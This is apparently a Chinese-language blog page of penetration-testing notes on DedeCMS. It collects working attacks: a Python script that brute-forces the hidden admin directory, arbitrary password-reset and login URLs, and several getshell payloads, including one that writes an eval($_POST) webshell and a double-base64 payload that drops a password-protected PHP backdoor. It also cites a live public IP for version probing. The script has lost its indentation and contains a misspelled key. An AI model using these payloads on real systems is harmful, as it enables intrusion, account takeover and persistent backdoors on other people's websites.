dedecms

解决DEDECMS历史难题–找后台目录

https://xz.aliyun.com/t/2064
py脚本:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2018-10-17 18:57:00
# @Author : Your Name (you@example.org)
# @Link : http://example.org
# @Version : $Id$
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import requests
import itertools
characters= "bacdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir=""
flag=0
url="http://192.168.0.6/uploads/tags.php"
data={
"_FILES[mochazz][tmp_name]":"./{p}<</images/adminico.gif",
"_FILES[mochazz][name]":0,
"_FILES[mochazz][size]":0,
"_FILES[mochazz][type]":"image/gif"
}
for num in range(1,7):
if flag:
break
for pre in itertools.permutations(characters,num):
pre=''.join(list(pre))
data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
print "test",pre
r=requests.post(url,data=data)
if "Upload filetype not allow" not in r.text and r.status_code==200:
flag=1
back_dir=pre
data["_FIES[mochazz][tmp_name]"]='./{p}<</images/adminico.gif'
break
else:
data["_FILES[mochazz][tmp_name]"]="./{p}<</images/adminico.gif"
print "[+]前缀为:",back_dir
flag=0
for i in range(30):
if flag:
break
for ch in characters:
if ch==characters[-1]:
flag=1
break
data["_FILES[mochazz][tmp_name]"]=data["_FILES[mochazz][tmp_name]"].format(p=str(back_dir+ch))
r=requests.post(url,data=data)
if "Upload filetype not allow" not in r.text and r.status_code==200:
print back_dir
back_dir+=ch
print "[+]",back_dir
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
break
else:
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
print "后台地址为:",back_dir

dedecms利用通配符找后台目录及其防御方案

https://paper.tuisec.win/detail/d1053143f127862

查看dede当前版本,补丁情况:

http://120.24.86.145:9008/data/admin/ver.txt

漏洞组合拳 | 重置dedecms管理员后台密码重现及分析

https://paper.tuisec.win/detail/9f8848f38c37fb4

0×01 前台任意用户密码重置分析
POC:
第一步:访问
http://192.168.0.6/uploads/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanwser=&id=1 得到key

第二步,访问
http://192.168.0.6/uploads/member/resetpassword.php?dopost=getpasswd&id=1&key=MojdDnk2

0x02前台任意用户登入

0x03后台用户登入

DedeCMS-V5.7-UTF8-SP2

( 发布日期 2017-03-15 )

DedeCMS_v5.7_shops_delivery_存储型XSS

https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS_v5.7_shops_delivery_%E5%AD%98%E5%82%A8%E5%9E%8BXSS
后台配送

dedeCMS V5.7 SP2 后台Getshell

https://xz.aliyun.com/t/2071

Dedecms V5.7后台任意代码执行[CVE-2018-7700]

https://paper.tuisec.win/detail/4865b03a4ed783c
poc:

http://192.168.0.6/uploads/dede/tag_test_action.php?url=a&token=&partcode={dede:field name='source' runphp='yes'}fputs(fopen(base64_decode(eWVzaTEucGhw),w),base64_decode(base64_decode(UEhOamNtbHdkQ0JzWVc1bmRXRm5aVDBpY0dod0lqNUFaWFpoYkNna1gxQlBVMVJiZVdWemFURmRLVHd2YzJOeWFYQjBQZz09)));{/dede:field}

写入yesi1.php 密码yesi1

DedeCMS V5.7 SP2后台存在代码执行漏洞

https://paper.tuisec.win/detail/6e00f45732a11ac
poc:

http://192.168.0.6/uploads/dede/tpl.php?filename=yesi.lib.php&action=savetagfile&content=<script language="php">@eval($_POST[yesi1])</script>&token=

再访问:

http://192.168.0.6/uploads/include/taglib/yesi.lib.php

Dedecms V5.7 后台文件重命名[CVE-2018-9134] getshell

https://paper.tuisec.win/detail/3cfdfcc79be50de

poc:

先上传任意文件,再

http://192.168.0.6/dedecms/dede/file_manage_control.php?fmdo=rename&oldfilename=dedecms/yesi.zip&newfilename=dedecms/yesi.php

DedeCMS_v5.7_友情链接CSRF_GetShell

https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS_v5.7_%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5CSRF_GetShell

当前网速较慢或者你使用的浏览器不支持博客特定功能,请尝试刷新或换用Chrome、Firefox等现代浏览器